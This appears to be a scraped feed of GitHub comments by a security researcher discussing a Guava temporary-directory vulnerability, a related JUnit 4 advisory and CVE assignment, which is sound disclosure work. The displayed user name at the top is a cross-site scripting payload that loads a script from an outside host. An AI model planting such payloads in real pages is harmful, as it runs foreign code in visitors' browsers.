Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
I'm no longer working for the company that was actually using this library (just moved from working for HPE to working for Gradle). As such, this is no longer the...
@cy6erGn0m (The start of a potentially bad thought) Is there any good way to detect a development vs production environment and enable this? Or perhaps auto enable when TLS is...
@cy6erGn0m Can you add a disclaimer to the documentation with a big warning telling users to enable this feature before shipping to production?
Can someone from Google make an official statement on whether or not this issue will receive a CVE number or not?
@melloware, this is indeed a security vulnerability, however, given that the severity of this vulnerability is quite low, I think that the way that Google and the Guava team has...
A few options for you. 1. Push back on Sonatype's analysis of this vulnerability. As a customer, if you think that your security vendor's analysis of a given vulnerability is...
> It won't help much we have over 50 in production applications using it so we would have to add this test to each one and all future applications. Agreed....
@semmalimayan here's the method you're asking about. https://github.com/google/guava/blob/fec0dbc4634006a6162cfd4d0d09c962073ddf40/guava/src/com/google/common/io/Files.java#L470-L487 The true answer here is "it depends". For example, this would be vulnerable: ```java File tempDirChild = new File(System.getProperty("java.io.tmpdir"), "/child/text_file.txt"); com.google.common.io.Files.createParentDirs(tempDirChild); //...
A similar vulnerability has been disclosed and patched in JUnit 4. CVE pending. https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp To reiterate my earlier question: > Can someone from Google make an official statement on whether...
After spending some time talking with some others in the security community, defaulting to having a CVE number assigned is prefered. It will help keep the ecosystem sane by providing...